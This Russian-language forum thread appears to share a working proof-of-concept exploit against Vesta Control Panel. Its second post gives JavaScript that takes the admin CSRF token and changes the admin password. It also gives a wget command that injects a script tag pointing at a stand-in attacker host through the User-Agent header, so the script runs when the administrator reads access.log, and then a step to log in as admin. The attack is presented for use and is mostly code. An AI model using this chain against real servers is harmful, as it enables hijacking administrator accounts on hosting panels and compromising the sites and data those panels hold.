↑ ↓

Информация Серьёзная уязвимость в Vesta Control Panel

Vesta Control Panel взлом

  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Пользователь X-Shar разместил новый ресурс:

    Серьёзная уязвимость в Vesta Control Panel - Vesta Control Panel взлом

    Узнать больше об этом ресурсе...
     
    • Мне нравится Мне нравится x 1
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Сплоит для Весты:
    Код:
    Poc Exploit
    ================
    1.Подготовьте js файл (evil.js):
    
    function csrfWithToken(url,hanimisToken,password){
      $.get(url, function(gelen) {
        $('body').append($(gelen));
        $('form[id="vstobjects"]').css("display","none");
        var token = $(hanimisToken).attr("token");
        $('form[id="vstobjects"]').attr("action",url);
        $('input[name="v_password"]').val(password);
        $('form[id="vstobjects"]').submit();
      });
    };
    //password = 1234567
    csrfWithToken("/edit/user/?user=admin","#token","123456");
    
    2. Сделайте Get-запрос с этим js-файлом:
    wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver
    
    3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js
    
    4. Логинимся с изменённым паролем:
    http(s)://victim:8083/
      
     
    Последнее редактирование: 27 июн 2016
    • Мне нравится Мне нравится x 1

Поделиться этой страницей